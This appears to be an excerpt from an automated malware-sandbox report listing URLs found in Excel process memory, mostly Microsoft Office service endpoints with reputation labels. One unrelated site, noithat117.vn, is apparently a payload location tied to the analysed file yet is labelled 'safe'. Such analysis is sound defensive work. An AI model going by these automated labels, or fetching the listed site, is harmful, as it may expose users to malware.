https://officeci.azurewebsites.net/api/	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize#	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize$	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize%	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://store.office.cn/addinstemplate	EXCEL.EXE, 00000000.00000003.458245826.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426971409.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253524497.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436961437.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453590375.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.293240983.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450030728.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451632929.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455517125.000000000FCB7000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize&	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13dll	EXCEL.EXE, 00000000.00000002.586620207.000000000FBC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436471329.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426765815.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458009107.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451359829.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.449812627.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253277111.000000000FBED000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.452598231.000000000FBC3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455066934.000000000FBC3000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://api.powerbi.com/v1.0/myorg/groupsBearer	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://www.odwebp.svc.ms	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://substrate.office.comk	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://web.microsoftstream.com/video/	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://noithat117.vn/N_k	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlL	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://api.onedrive.comMBI	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://ncus.contentsync.	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.cortana.aiL	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.	EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
http://weather.service.msn.com/data.aspx	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://api.cortana.aiP	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.comP	EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://devnull.onenote.comMBI_SSL_SHORT	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://wus2.contentsync.	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeX	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
